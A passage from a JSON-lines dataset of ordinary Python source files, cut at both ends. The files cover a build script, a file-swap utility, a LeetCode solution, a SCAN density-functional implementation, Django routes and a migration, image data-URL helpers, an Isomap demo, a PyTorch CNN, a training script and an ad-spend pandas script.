should be a sequence of strings, not a string\")\n\n return subprocess.run(args, cwd=cwd, shell=shell)\n\ndef run_ort_module_tests(cwd, source_dir):\n args = [sys.executable, os.path.join(source_dir, 'tests/bert_for_sequence_classification.py')]\n run_subprocess(args, cwd)\n\ndef build_wheel(cwd, source_dir):\n args = [sys.executable, os.path.join(source_dir, 'setup.py'), 'bdist_wheel']\n run_subprocess(args, cwd)\n\ndef main(): \n source_dir = os.path.realpath(os.path.dirname(__file__))\n cwd = os.path.normpath(os.path.join(source_dir, \"..\"))\n\n build_wheel(source_dir, source_dir)\n\n dist_path = os.path.join(source_dir, 'dist')\n wheel_file = os.listdir(dist_path)[0]\n run_subprocess([sys.executable, \"-m\", \"pip\", \"install\", \"--upgrade\", os.path.join(dist_path, wheel_file)], cwd)\n\n run_ort_module_tests(source_dir, source_dir)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"82399238","text":"def dataSwipe():\r\n f1 = input(\"Enter First File Name: \")\r\n f2 = input(\"Enter Second File Name: \")\r\n\r\n with open(f1,\"r\") as a:\r\n data_a = a.read()\r\n with open(f2,\"r\") as b:\r\n data_b = b.read()\r\n\r\n with open(f1,\"w\") as a:\r\n a.write(data_b)\r\n with open(f2,\"w\") as b:\r\n b.write(data_a)\r\n\r\ndataSwipe()\r\n ","sub_path":"project98.py","file_name":"project98.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"65301619","text":"class Solution:\n def maxScore(self, points: List[int], k: int) -> int:\n # return self.use_sliding_window(points, k)\n return self.dfs_w_mem(points, k)\n # return self.dfs_search(points, k)\n \n def use_sliding_window(self, points, k):\n total = sum(points[-k:])\n if len(points) <= k:\n return total\n \n res = total\n for i in range(k):\n total = total - points[-k+i] + points[i]\n res = max(res, total)\n \n return res\n\n \n def dfs_w_mem(self, points, k):\n # DOESN\"T WORK! TLE\n n = len(points)\n # i: start idx; j: ending idx; val: path value\n dp = [[[-2**30] * k for j in range(n)]for _ in range(n)]\n \n def _traverse(points, i, j, k, dp):\n \n if k == -1:\n return 0\n \n if dp[i][j][k] != -2**30:\n return dp[i][j][k]\n \n left = _traverse(points, i+1, j, k-1, dp) + points[i]\n right = _traverse(points, i, j-1, k-1, dp) + points[j]\n \n dp[i][j][k] = max(left, right)\n return dp[i][j][k]\n\n return _traverse(points, 0, len(points)-1, k-1, dp)\n \n def dfs_search(self, points, k):\n def traverse(points, cur_k, K):\n if not points:\n return 0\n \n if cur_k == K:\n return 0\n \n left, right = 0, 0\n if points:\n left = traverse(points[1:], cur_k + 1, K) + points[0]\n\n if points:\n right = traverse(points[:-1], cur_k + 1, K) + points[-1]\n\n return max(left, right)\n \n return traverse(points, 0, k)\n\n\n","sub_path":"leetcode/lc1423_Maximum_Points_You_Can_Obtain_from_Cards.py","file_name":"lc1423_Maximum_Points_You_Can_Obtain_from_Cards.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"469225128","text":"import numpy as np\nfrom math import pi\n\nDEFAULT_X_PARAMS = dict(\n K1 = 0.065,\n A1 = 4.9479,\n C1X = 0.667,\n C2X= 0.8,\n DX = 1.24,\n CXBX = 1.0,\n MUAK = 10.0/81.0,\n K0 = 0.1740,\n B1X = 0.156632,\n B2X = 0.12083,\n B3X = 0.5,\n B4X = 0.2218,\n AX = -0.7385587663820224058842300326808360\n)\n\nDEFAULT_C_PARAMS = dict(\n C1C = 0.64,\n C2C = 1.5,\n DC = 0.7,\n B1C = 0.0285764,\n B2C = 0.0889,\n B3C = 0.125541,\n KAILD = 0.12802585262625815,\n GAMMA = 0.031090690869654895034940863712730,\n BETA_MB = 0.066724550603149220,\n AFACTOR = 0.1,\n BFACTOR = 0.1778,\n BETA_RS_0 = 0.066725, # Same as BETA_MB?\n C_TILDE = 1.467,\n P_TAU = 4.5,\n F0 = -0.9\n)\n\n\ndef getscan_x(params, d0, d1, g0, g1, t0, t1, only_0=False, only_Fx=False):\n # First spin 0\n rho = 2*d0\n drho = 2*g0\n tauw = drho**2/rho/8.0\n tau_rho = 2*t0\n p = drho**2/(4*(3*pi**2)**(2.0/3.0)*rho**(8.0/3.0))\n tau_unif = 3.0/10.0*(3*pi**2)**(2.0/3.0)*rho**(5.0/3.0)\n alpha = (tau_rho - tauw)/tau_unif\n\n # construct LDA exchange energy density\n exunif_0 = params['AX']*rho**(1.0/3.0)\n exlda_0 = exunif_0*rho\n\n # and enhancement factor\n\n Fx0 = scanFx(params, p, alpha)\n\n Ex_0 = exlda_0*Fx0\n\n if only_0:\n return Ex_0\n\n # Now spin 1\n rho = 2*d1\n drho = 2*g1\n tauw = drho**2/rho/8.0\n tau_rho = 2*t1\n p = drho**2/(4*(3*pi**2)**(2.0/3.0)*rho**(8.0/3.0))\n tau_unif = 3.0/10.0*(3*pi**2)**(2.0/3.0)*rho**(5.0/3.0)\n alpha = (tau_rho - tauw)/tau_unif\n\n # construct LDA exchange energy density\n exunif_1 = params['AX']*rho**(1.0/3.0)\n exlda_1 = exunif_1*rho\n\n # and enhancement factor\n Fx1 = scanFx(params, p, alpha)\n Ex_1 = exlda_1*Fx1\n\n if only_Fx:\n return Fx0, Fx1\n\n return (Ex_0 + Ex_1)/2.0\n\n\ndef scanFx(params, p, alpha):\n p2 = p**2\n oma = 1.0 - alpha\n oma2 = oma**2\n\n # make HX0\n hx0 = 1.0 + params['K0']\n\n # make HX1\n cfb4 = params['MUAK']**2/params['K1'] - 0.112654\n wfac = cfb4*p2*np.exp(-abs(cfb4)*p/params['MUAK'])\n vfac = params['B1X']*p + params['B2X']*oma*np.exp(-params['B3X']*oma2)\n yfac = params['MUAK']*p + wfac + vfac**2\n hx1 = 1.0 + params['K1'] - params['K1']/(1.0 + yfac/params['K1'])\n\n # FA\n FA = np.zeros(alpha.shape)\n FA[alpha < 1.0] = np.exp(-params['C1X']*alpha[alpha < 1.0]/oma[alpha < 1.0])\n FA[alpha > 1.0] = -params['DX']*np.exp(params['C2X']/oma[alpha > 1.0])\n\n # gx\n gx = get_gx(params, p) \n\n # Fx1\n Fx1 = hx1 + FA*(hx0 - hx1)\n\n # Fx\n return Fx1*gx\n\ndef get_gx(params, p):\n p14 = p**(1.0/4.0)\n gx = np.ones(p.shape)\n gx[p > 0.0] = 1.0 - np.exp(-params['A1']/p14[p > 0.0])\n return gx\n\ndef getscan_c(params, dT, gT, tT, zeta):\n \"\"\"\n This follows the ugly Fortran of the original optimisation program. Sorry.\n\n Note: g0 and g1 are absolute value of gradients\n \"\"\"\n\n gTT = gT**2\n tauw = gTT/(8*dT)\n\n\n ds_zeta = (np.power(1.0 + zeta, 5.0/3.0) + np.power(1.0 - zeta, 5.0/3.0))/2.0\n dx_zeta = (np.power(1.0 + zeta, 4.0/3.0) + np.power(1.0 - zeta, 4.0/3.0))/2.0\n tau0 = 0.3*np.power(3*pi**2, 2.0/3.0)*np.power(dT, 5.0/3.0)*ds_zeta\n alpha = (tT - tauw)/tau0\n\n # Alpha interpolation Function\n f_alpha = np.zeros(alpha.shape)\n f_alpha[alpha < 1.0] = np.exp(params['C1C']*alpha[alpha < 1.0]/(alpha[alpha < 1.0] - 1.0))\n f_alpha[alpha > 1.0] = -params['DC']*np.exp(-params['C2C']/(alpha[alpha > 1.0] - 1.0))\n\n dthrd = np.exp(np.log(dT)*1.0/3.0)\n rs = (0.75/pi)**(1.0/3.0)/dthrd\n\n s = gT/(2.0*(3.0*pi**2)**(1.0/3.0)*np.power(dT, 4.0/3.0))\n\n eppgga0 = corgga_0(params, rs, s, zeta)\n eppgga1 = corgga_1(params, rs, s, zeta)\n\n epp = eppgga1 + f_alpha*(eppgga0 - eppgga1)\n\n return dT*epp\n\n\ndef corgga_0(params, rs, s, zeta):\n # _0 does not refer to spin in function name\n\n ax_lda = -3.0/(4.0*pi)*(9.0*pi/4.0)**(1.0/3.0)\n\n phi = (np.exp((2.0/3.0)*np.log(1.0 + zeta)) + np.exp((2.0/3.0)*np.log(1.0 - zeta)))/2.0\n afix_T = np.sqrt(pi/4.0)*np.power(9.0*pi/4.0, 1.0/6.0)\n\n sqrt_rs = np.sqrt(rs)\n f1 = 1.0 + params['B2C']*sqrt_rs + params['B3C']*rs\n ec0_lda = -params['B1C']/f1\n\n\n dx_zeta = (np.power(1.0 + zeta, 4.0/3.0) + np.power(1.0 - zeta, 4.0/3.0))/2.0\n gc_zeta = (2**(1.0/3.0) - dx_zeta)/(2**(1.0/3.0) - 1.0) # This is different from published?!\n\n w0 = np.exp(-ec0_lda/params['B1C']) - 1.0\n\n gf_inf = 1.0/(1.0 + 4.0*params['KAILD']*s**2)**(1.0/4.0)\n\n hcore0 = 1.0 + w0*(1.0 - gf_inf)\n h0 = params['B1C']*np.log(hcore0)\n\n EPPGGA = (ec0_lda + h0)*gc_zeta\n\n return EPPGGA\n\n\ndef corgga_1(params, rs, s, zeta):\n\n dthrd = rs/(0.75/pi)**(1.0/3.0)\n phi = (np.power(1.0 + zeta,2.0/3.0) + np.power(1.0 - zeta,2.0/3.0))/2.0\n\n afix_T = np.sqrt(pi/4.0)*np.power(9.0*pi/4.0, 1.0/6.0)\n\n T = afix_T*s/np.sqrt(rs)/phi\n FK = (3.0*pi**2)**(1.0/3.0)*dthrd\n sk = np.sqrt(4.0*FK/pi)\n\n EC, H = corpbe_rtpss(rs, zeta, T, phi, sk)\n\n beta_num = 1.0 + params['AFACTOR']*rs\n beta_den = 1.0 + params['BFACTOR']*rs\n beta = params['BETA_MB']*beta_num/beta_den\n\n phi3 = phi**3\n pon = -EC/(phi3*params['GAMMA'])\n w = np.exp(pon) - 1\n\n A = beta/(params['GAMMA']*w)\n V = A*T**2\n\n f_g = 1.0/np.power(1.0 + 4.0*V, 0.25)\n\n hcore = 1.0 + w*(1.0 - f_g)\n ah = params['GAMMA']*phi**3\n H = ah*np.log(hcore)\n\n return EC+H\n\n\ndef corpbe_rtpss(rs, zeta, T, phi, sk):\n GAM = 0.51984209978974632953442121455650 # 2^(4/3)-2\n FZZ = 8.0/(9.0*GAM)\n gamma = 0.031090690869654895034940863712730 # (1-log(2))/pi^2\n bet_mb = 0.066724550603149220\n sqrt_rs = np.sqrt(rs)\n\n EU, EURS = gcor2(0.03109070, 0.213700, 7.59570, 3.58760, 1.63820, 0.492940, sqrt_rs)\n EP, EPRS = gcor2(0.015545350, 0.205480, 14.11890, 6.19770, 3.36620, 0.625170, sqrt_rs)\n ALFM, ALFRSM = gcor2(0.01688690, 0.111250, 10.3570, 3.62310, 0.880260, 0.496710, sqrt_rs)\n\n ALFC = -ALFM\n Z4 = zeta**4\n\n # LDA part of the energy\n F = ((1.0 + zeta)**(4.0/3.0) + (1.0 - zeta)**(4.0/3.0) - 2.0)/GAM\n EC = EU*(1.0 - F*zeta**4) + EP*F*Z4 - ALFM*F*(1.0 - Z4)/FZZ\n\n # PBE correction\n bet = bet_mb*(1.0 + 0.1*rs)/(1.0 + 0.1778*rs)\n\n delt = bet/gamma\n phi3 = phi**3\n pon = -EC/(phi3*gamma)\n B = delt/(np.exp(pon) - 1.0)\n B2 = B**2\n T2 = T**2\n T4 = T**4\n Q4 = 1.0 + B*T2\n Q5 = 1.0 + B*T2 + B2*T4\n H = phi3*(bet/delt)*np.log(1.0 + delt*Q4*T2/Q5) # Non-local part of correlation\n\n return EC, H\n\n\ndef gcor2(A, A1, B1, B2, B3, B4, sqrtrs):\n Q0 = -2.0*A*(1.0 + A1*sqrtrs*sqrtrs)\n Q1 = 2.0*A*sqrtrs*(B1 + sqrtrs*(B2 + sqrtrs*(B3 + B4*sqrtrs)))\n Q2 = np.log(1.0 + 1.0/Q1)\n GG = Q0*Q2\n Q3 = A*(B1/sqrtrs + 2.0*B2 + sqrtrs*(3.0*B3 + 4.0*B4*sqrtrs))\n GGRS = -2.0*A*A1*Q2 - Q0*Q3/(Q1*(1.0 + Q1))\n return GG, GGRS\n\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Beginning XCFun style SCAN implementation\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\ndef getscan_x_both(params, d0, d1, g0, g1, t0, t1, weights):\n e0 = getscan_x(params, 2*d0, 2*g0, 2*t0, weights)\n e1 = getscan_x(params, 2*d1, 2*g1, 2*t1, weights)\n return 0.5*(e0 + e1)\n\n\ndef getscan_c_both(params, d0, d1, g0, g1, t0, t1, weights):\n zeta = (d0 - d1)/(d0 + d1)\n e0 = getscan_c(params, d0, d1, np.abs(g0), np.abs(g1), t0, t1, zeta, weights)\n return e0\n\n\ndef eps_c_0_high_dens_zeta_0(params, s):\n \"\"\"\n Assuming zeta = 0\n \"\"\"\n\n cx = -(3.0/(4.0*pi))*(9.0*pi/4.0)**(1.0/3.0)\n beta_inf = params['BETA_RS_0']*params['AFACTOR']/params['BFACTOR']\n chi_inf = (3.0*pi**2/16.0)**(2.0/3.0)*beta_inf/(cx - params['F0']) # checked\n g_inf = 1.0/np.power(1.0 + 4*chi_inf*s**2, 1.0/4.0)\n return params['B1C']*np.log(1.0 - g_inf*np.expm1(1)/np.exp(1))\n\n\n","sub_path":"SCANL.py","file_name":"SCANL.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"426172243","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n # /dashboard/\n path('', views.index, name='index'),\n # /dashboard/1/\n path('/', views.details, name='details'),\n # /dashboard/1/edit/\n path('/edit/', views.edit, name='edit'),\n # /dashboard/add/\n path('add/', views.add, name='add'),\n # /dashboard/addnew/\n path('addnew/', views.addnew, name='addnew'),\n]\n","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"599616867","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom base64 import b64decode, b64encode\n\nimport cv2\nimport numpy as np\nimport logging\n\nlogger = logging.getLogger(\"uvicorn.error\")\n\n\nclass InvalidDataURL(Exception):\n def __str__(self):\n return \"Invalid Data URL\"\n\n\nclass DataURLConvertError(Exception):\n def __str__(self):\n return \"Cannot convert to Data URL\"\n\n\ndef data_url_to_ndarray(data_url: str) -> np.ndarray:\n \"\"\"\n Data URL から画像 (numpy.ndarray) に変換する\n\n Parameters\n ----------\n data_url : str\n Data URL\n\n Returns\n -------\n np.ndarray\n 画像データが格納された Numpy 配列\n \"\"\"\n\n logger.debug(\"data_url: {}\".format(data_url[:20]))\n _, b64_data = data_url.split(\",\")\n\n img = cv2.imdecode(\n np.frombuffer(\n b64decode(b64_data),\n dtype=np.uint8\n ),\n cv2.IMREAD_ANYCOLOR\n )\n\n if img is None:\n raise InvalidDataURL()\n\n return img\n\n\ndef ndarray_to_data_url(img: np.ndarray) -> str:\n \"\"\"\n Data URL から画像 (numpy.ndarray) に変換��る\n\n Parameters\n ----------\n img : np.ndarray\n 画像データが格納された Numpy 配列\n\n Returns\n -------\n str\n Data URL\n \"\"\"\n\n DATA_URL_PREFIX = \"data:image/png;base64\"\n\n success, img_data = cv2.imencode(\".png\", img)\n\n if not success:\n raise DataURLConvertError()\n\n return \",\".join([\n DATA_URL_PREFIX,\n b64encode(img_data).decode(\"ascii\")\n ])\n","sub_path":"backend/lib/img_util.py","file_name":"img_util.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"106213405","text":"# Source: https://gist.github.com/Mashimo/b8a8d4dc18bf6875c8547134b543898f\n\n\"\"\"\n The ALOI, Amsterdam Library of Object Images, hosts a huge collection of 1000 small objects that were photographed in such a controlled \n environment, by systematically varying the viewing angle, illumination angle, and illumination color for each object separately. \n It can be accessed here: http://aloi.science.uva.nl/\n It shows that the isomap embedding appears to follow an easily traversable, 3D spline \n\"\"\"\nimport pandas as pd\n\nimport imageio as misc\n# from scipy import misc\nfrom sklearn import manifold\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D # <--- This is important for 3d plotting ## Source: https://stackoverflow.com/questions/56222259/valueerror-unknown-projection-3d-once-again/56222305\n\nimport os\n\n# Look pretty...\nplt.style.use('ggplot')\n\n\n#\n# Start by creating a regular old, plain, \"vanilla\"\n# python list. \n#\nsamples = []\ncolours = []\n\n#\n# for-loop that iterates over the images in the\n# Datasets/ALOI/32/ folder, appending each of them to\n# your list. Each .PNG image should first be loaded into a\n# temporary NDArray.\n#\n# Optional: Resample the image down by a factor of two if you\n# have a slower computer. You can also convert the image from\n# 0-255 to 0.0-1.0 if you'd like, but that will have no\n# effect on the algorithm's results.\n#\ndirectory = \"./hw4/Datasets/ALOI/32/\"\nfor fname in os.listdir(directory):\n fullname = os.path.join(directory, fname)\n img = misc.imread(fullname)\n # samples.append( (img[::2, ::2] / 255.0).reshape(-1) ) RESAMPLE\n samples.append( (img).reshape(-1) )\n colours.append('b') # blue colour\n\n#\n# appends to your list the images\n# in the /Datasets/ALOI/32_i directory. \n#\ndirectory = \"./hw4/Datasets/ALOI/32i/\"\nfor fname in os.listdir(directory):\n fullname = os.path.join(directory, fname)\n img = misc.imread(fullname)\n # samples.append( (img[::2, ::2] / 255.0).reshape(-1) ) RESAMPLE\n samples.append( (img).reshape(-1) )\n colours.append('r') # red colour\n\n#\n# Convert the list to a dataframe\n#\ndf = pd.DataFrame( samples )\n\n\n#\n# Implement Isomap here. Reduce the dataframe df down\n# to three components, using K=6 for your neighborhood size\n#\niso = manifold.Isomap(n_neighbors=6, n_components=3)\niso.fit(df)\n\nmy_isomap = iso.transform(df)\n\n\n#\n# Create a 2D Scatter plot to graph your manifold. You\n# can use either 'o' or '.' as your marker. Graph the first two\n# isomap components\n#\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.set_title(\"ISO transformation 2D\")\n\nax.scatter(my_isomap[:,0], my_isomap[:,1], marker='.', c=colours)\n\n#\n# Create a 3D Scatter plot to graph your manifold. You\n# can use either 'o' or '.' as your marker:\n#\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nax.set_title(\"ISO transformation 3D\")\n\nax.scatter(my_isomap[:,0], my_isomap[:,1], my_isomap[:,2], marker='.', c=colours)\n\nplt.show()","sub_path":"hw4/research_purpose/isomap_aloi.py","file_name":"isomap_aloi.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15694269","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Activity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('timestamp', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ActivityType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Patient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ('email', models.EmailField(unique=True, max_length=70)),\n ('birth_date', models.DateField()),\n ('gender', models.CharField(max_length=2, choices=[(b'M', b'Male'), (b'F', b'Female')])),\n ('height', models.IntegerField(max_length=3)),\n ('weight', models.DecimalField(max_digits=6, decimal_places=3)),\n ('token', models.CharField(max_length=60)),\n ('updated', models.DateTimeField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ProfessionalPatient',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('patients', models.ManyToManyField(to='fitmodel.Patient')),\n ('professional', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Registry',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('value', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='RegistryType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=100)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='registry',\n name='type',\n field=models.ForeignKey(to='fitmodel.RegistryType'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='activity',\n name='patient',\n field=models.ForeignKey(to='fitmodel.Patient'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='activity',\n name='type',\n field=models.ForeignKey(to='fitmodel.ActivityType'),\n preserve_default=True,\n ),\n ]\n","sub_path":"fitmodel/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"633293258","text":"import torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\n\nclass CNN(nn.Module):\n\n def __init__(self):\n super(CNN, self).__init__()\n self.pool1 = nn.MaxPool2d((2, 2))\n self.pool2 = nn.MaxPool2d((4, 4))\n self.drop_out1 = nn.Dropout2d(0.2)\n self.drop_out2 = nn.Dropout2d(0.4)\n\n self.conv1 = nn.Conv2d(in_channels=4, out_channels=32, kernel_size=(2, 2), stride=(1, 1), bias=True)\n self.batchnorm1 = nn.BatchNorm2d(32)\n\n self.conv2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=(4, 4), stride=(1, 1), bias=True)\n self.batchnorm2 = nn.BatchNorm2d(64)\n\n self.conv3 = nn.Conv2d(in_channels=64, out_channels=256, kernel_size=(4, 4), stride=(1, 1), bias=True)\n self.batchnorm3 = nn.BatchNorm2d(256)\n\n self.input = nn.Linear(256*14*14, 256, True)\n self.fc1 = nn.Linear(256, 128, True)\n self.fc2 = nn.Linear(128, 64, True)\n self.out = nn.Linear(64, 3)\n\n def forward(self, x):\n\n x = self.pool1(F.relu(self.conv1(x)))\n x = self.batchnorm1(x)\n x = self.drop_out2(x)\n x = self.pool1(F.relu(self.conv2(x)))\n x = self.batchnorm2(x)\n x = self.drop_out2(x)\n x = self.pool2(F.relu(self.conv3(x)))\n x = self.batchnorm3(x)\n x = self.drop_out2(x)\n\n x = x.view(x.size()[0], -1)\n\n x = F.relu(self.input(x))\n x = self.drop_out2(x)\n x = F.relu(self.fc1(x))\n x = self.drop_out2(x)\n x = F.relu(self.fc2(x))\n x = self.drop_out1(x)\n x = self.out(x)\n return F.log_softmax(x, dim=1)\n","sub_path":"Projects/Build_week_3/cnn_model.py","file_name":"cnn_model.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563039612","text":"import os\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch.autograd import Variable\n\nimport configs\nfrom modules import data, action\nfrom modules.action import ActionModule\nfrom modules.agent import AgentModule\nfrom modules.game import GameModule\nfrom modules.predefined_utterances_module import PredefinedUtterancesModule\nfrom modules.utterance import Utterance\nfrom train import parser\n\n#to delete after testing utterance relvance\ncolors_dict = ['red', 'green', 'blue']\nshapes_dict = ['circle', 'triangle']\n\ndef main():\n args = vars(parser.parse_args())\n mode = args['mode']\n if mode == 'selfplay':\n selfplay = True\n else:\n selfplay = False\n one_sentence_mode = args['one_sentence_data_set']\n run_default_config = configs.get_run_config(args)\n folder_dir = run_default_config.folder_dir\n agent_config = configs.get_agent_config(args)\n game_config = configs.get_game_config(args)\n utterance_config = configs.get_utterance_config()\n training_config = configs.get_training_config(args, folder_dir)\n corpus = data.WordCorpus('data' + os.sep, freq_cutoff=20, verbose=True)\n agent = AgentModule(agent_config, utterance_config, corpus, run_default_config.creating_data_set_mode,\n run_default_config.create_utterance_using_old_code)\n utter = Utterance(agent_config.action_processor, utterance_config, corpus, run_default_config.create_utterance_using_old_code)\n if not mode == \"train_utter\":\n folder_dir_fb_model = utterance_config.fb_dir\n with open(folder_dir_fb_model, 'rb') as f:\n utter.load_state_dict(torch.load(f))\n action = ActionModule(agent_config.action_processor, utterance_config, corpus, run_default_config.create_utterance_using_old_code)\n create_data_set = PredefinedUtterancesModule()\n if one_sentence_mode:\n num_agents = np.random.randint(game_config.min_agents,\n game_config.max_agents + 1)\n num_landmarks = np.random.randint(game_config.min_landmarks,\n game_config.max_landmarks + 1)\n agent.reset()\n game = GameModule(game_config, num_agents, num_landmarks, folder_dir)\n df_utterance = [pd.DataFrame(index=range(game.batch_size), columns=agent.df_utterance_col_name\n , dtype=np.int64) for i in range(game.num_agents)]\n iter = random.randint(0, game.time_horizon)\n df_utterance = create_data_set.generate_sentences(game, iter, df_utterance, one_sentence_mode, mode=mode)\n for epoch in range(training_config.num_epochs):\n if not one_sentence_mode:\n num_agents = np.random.randint(game_config.min_agents,\n game_config.max_agents + 1)\n num_landmarks = np.random.randint(game_config.min_landmarks,\n game_config.max_landmarks + 1)\n agent.reset()\n game = GameModule(game_config, num_agents, num_landmarks, folder_dir)\n df_utterance = [pd.DataFrame(index=range(game.batch_size), columns=agent.df_utterance_col_name\n ,dtype=np.int64) for i in range(game.num_agents)]\n iter = random.randint(0, game.time_horizon)\n df_utterance = create_data_set.generate_sentences(game, iter, df_utterance, one_sentence_mode, mode=mode)\n agent_num = random.randint(0, game.num_agents-1)\n physical_feat = agent.get_physical_feat(game, agent_num)\n mem = Variable(torch.zeros(game.batch_size, game.num_agents,game_config.memory_size)[:, agent_num])\n utterance_feat = torch.zeros([game.batch_size, 1, 256], dtype=torch.float)\n goal = game.observed_goals[:, agent_num]\n processed, mem = action.processed_data(physical_feat, goal, mem,\n utterance_feat)\n if selfplay and one_sentence_mode:\n processed = torch.load(args['folder_dir']+os.sep+'processed.pt')\n elif not selfplay and one_sentence_mode:\n torch.save(processed, args['folder_dir']+os.sep+'processed.pt')\n full_sentence = df_utterance[agent_num]['Full Sentence' + str(iter)]\n\n if selfplay:\n loss, utterance, _ = utter(processed, full_sentence, epoch=epoch)\n with open(folder_dir + os.sep + \"utterance_selfplay_annotation.csv\", 'a', newline='') as f:\n for index in range(len(utterance)):\n f.write(' '.join(corpus.word_dict.i2w(utterance[index].data.cpu())))\n f.write(\" \" + 'agent_color' + \" \" + colors_dict[df_utterance[agent_num]['agent_color'][index]])\n f.write(\" \" + 'agent_shape' + \" \" + shapes_dict[df_utterance[agent_num]['agent_shape'][index]])\n f.write(\" \" + 'lm_color' + \" \" + colors_dict[df_utterance[agent_num]['lm_color'][index]])\n f.write(\" \" + 'lm_shape' + \" \" + shapes_dict[df_utterance[agent_num]['lm_shape'][index]])\n f.write('\\n')\n else:\n loss, utterance, folder_dir = utter(processed, full_sentence, epoch=epoch)\n with open(folder_dir + os.sep + \"utterance_out_fb.csv\", 'a', newline='') as f:\n f.write(\"-----\")\n f.write(full_sentence[1])\n f.write(\"----\")\n f.write(colors_dict[df_utterance[agent_num]['agent_color'][1]])\n f.write(\" \" + str(df_utterance[agent_num]['dist'][1]))\n f.write(\" \" + str(iter))\n f.write('\\n')\n if mode == 'train_utter':\n with open(training_config.save_model_file, 'wb') as f:\n torch.save(utter.state_dict(), f)\n print(\"Saved agent model weights at %s\" % training_config.save_model_file)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train_utter.py","file_name":"train_utter.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"636030249","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 26 14:34:00 2017\n\n@author: apogee_tpaschke\n\"\"\"\n\n\nimport pandas as pd \nimport pickle \nimport numpy as np \nimport pprint\n\nfile = 'Copy_of_FMJ_Spend_MTD_2017-04-27-1217.csv'\nfile2 = 'SDF-LineItems 6.csv'\n \nday = file[22:32]\nmtd = int(file[30:32])- 19\ndays_total = 20\n\n\nmonth = day[5:7]\nda = day[8:10]\nda = int(da)\nda = da -1 \ndate = '2017/'+month+\"/\"+str(da)\n\n\ndf = pd.read_csv('/Users/apogee_tpaschke/Downloads/'+file, error_bad_lines=False , low_memory = False)\ndf2 = pd.read_csv('/Users/apogee_tpaschke/Downloads/'+file2, error_bad_lines=False , low_memory = False)\n\n\ndf = df.drop(df.index[[-1,-2,-3,-4,-5,-6,-7,-8,-9,-10,-11,-12,-13,-14,-15,-16]])\n\n\n#only keep the columns we care about \nkeep_col = [ 'Date'\n ,'Advertiser'\n ,'Line Item ID'\n ,'Line Item'\n ,'Impressions'\n ,'Total Conversions'\n ,'Total Media Cost (Advertiser Currency)']\n\nkeep_col_2 = [ 'Line Item Id'\n ,'Name'\n ,'Budget Amount'\n ,'Frequency Exposures'\n ,'Bid Strategy Value']\n\n\n\n\n\ndf = df[keep_col]\ndf2 = df2[keep_col_2]\n\ndf = df.rename(columns={'Total Media Cost (Advertiser Currency)': 